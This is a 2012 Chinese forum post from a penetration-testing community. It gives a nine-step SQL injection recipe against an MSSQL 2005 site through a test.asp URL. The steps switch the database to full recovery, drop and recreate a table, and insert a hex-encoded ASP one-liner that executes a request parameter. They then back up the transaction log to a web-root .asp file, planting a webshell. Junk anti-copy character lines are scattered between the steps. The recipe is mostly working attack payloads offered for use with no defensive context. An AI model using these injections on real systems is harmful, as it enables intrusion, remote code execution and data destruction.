中国网络渗透测试联盟
标题:
Mssql2005 Log备份Webshell
[打印本页]
作者:
admin
时间:
2012-9-15 14:25
标题:
Mssql2005 Log备份Webshell
第一步
3 B0 S- J6 ~, `, F/ r
http://itpro.blog.163.com/test.asp';alter/
**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
7 \. J7 n- g. h% Y" Q
$ |% ]! @) d9 `% T
第二步:
" x, `4 a6 a/ ]/ u T. i C% E' e' d
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
) a$ C% }' \, W4 K& M4 q( E) y$ D
I+ Y& P3 v8 B0 A* W
第三步
) R5 Y9 \0 N4 R! y* i
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
/ T1 B% [5 \+ _7 I9 t
, E& l$ K$ b# n- ?$ M% m
第四步
2 \% ~. a) L+ s8 g# t6 ^9 C* E( ~
http://itpro.blog.163.com/test.asp';create/
**/table/**/[itpro]([a]/**/image)--
' J% `& _* `9 ]2 K% {6 U" N
6 l0 ?2 `8 j8 a% W
第五步
6 v2 ?6 `6 e+ [+ B/ }. I
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
! `, M+ W; T. B
" ]& |7 r- K- s6 M& e# }
第六步
6 Z. Y2 c# O- j, F; ]
http://itpro.blog.163.com/test.asp';insert/
**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
) g) x) G* ^% ]& g9 W/ `2 [% m
" p* i9 H! m! X1 e3 A: ^
第七步
0 p' J i& K: r/ V; e
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
$ L# ]( ^2 y* N2 D8 @' d1 |
6 K" ~) x) N& M @
第八步
0 {3 ? \! L. N) \
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
, c9 C( A7 n% h/ m: E" n4 _
; @1 _1 w/ w- w! W% F
第九步
6 Y! P2 b/ P* s6 B# g2 J+ h
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
. \4 J" ?5 Q6 L( x; c( s
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2